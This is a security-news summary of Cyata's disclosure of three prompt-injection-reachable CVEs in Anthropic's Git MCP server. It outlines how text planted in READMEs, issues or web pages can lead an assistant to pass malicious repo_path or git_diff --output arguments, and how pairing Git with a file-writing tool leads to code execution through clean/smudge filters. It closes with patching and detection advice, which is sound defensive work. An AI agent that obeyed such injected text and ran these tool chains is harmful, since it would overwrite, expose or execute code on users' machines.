Cyata — Prompt-injection reachable CVEs in Anthropic’s official Git MCP server

2026-01-30 • Category: AI CVEs

AI relevance: This is a concrete example of how “agent + tools” stacks turn prompt injection into real filesystem/code-impact via MCP tool calls and cross-tool chaining.

• Cyata reports 3 vulnerabilities in mcp-server-git (Anthropic’s reference Git server for MCP) that are reachable when an attacker can influence what the assistant reads (e.g., README/issue text/webpage content that gets pulled into context).
• The core pattern: the server trusts attacker-controlled tool arguments (notably repo_path) and forwards them into Git operations.
• CVE-2025-68145 (path validation bypass): lets an attacker direct operations to arbitrary directories/repositories on the host, not just the configured repo.
• CVE-2025-68143 (unrestricted git_init): enables initializing Git repos in arbitrary directories, which can be used as a stepping stone to reading/transforming files into model context.
• CVE-2025-68144 (argument injection in git_diff): attacker-controlled flags like --output=... can overwrite files (effectively deletion/corruption).
• Cyata also demonstrates a code execution chain when Git is combined with a file-writing capability (e.g., a filesystem MCP server or IDE write APIs), via Git’s clean/smudge filters configured in .git/config.
• Notably, the write-up emphasizes this works “out of the box” for default installs prior to the fix, making it a practical ops risk, not just a lab curiosity.

Why it matters

• “Prompt injection” stops being a purely model-level problem once tools exist: it becomes argument injection + privileged automation.
• MCP increases composability: Git + filesystem (or any writer) becomes a high-risk pairing because it enables multi-step exploit chains.
• If your assistant ingests untrusted text (issues, PR descriptions, docs, web pages), treat it like user-controlled input to privileged functions.

What to do

• Patch: update mcp-server-git to a fixed release (Cyata cites 2025.12.18+).
• Reduce tool blast radius: do not run Git + filesystem write tools together unless you must; scope filesystem servers to a minimal allowlist path.
• Constrain tool arguments: enforce server-side validation so parameters like repo_path cannot escape configured roots.
• Harden “tooling features”: consider blocking Git features that spawn shell commands (filters/hooks) in automated agent workflows, or run them inside a sandboxed runner/container.
• Detection: monitor for unexpected .git/ directories created outside repos and for suspicious Git config keys (e.g., filter.*.clean/smudge).

Links

• Cyata: Breaking Anthropic’s Official MCP Server (primary write-up)
• Infosecurity Magazine coverage
• CVE-2025-68143
• CVE-2025-68144
• CVE-2025-68145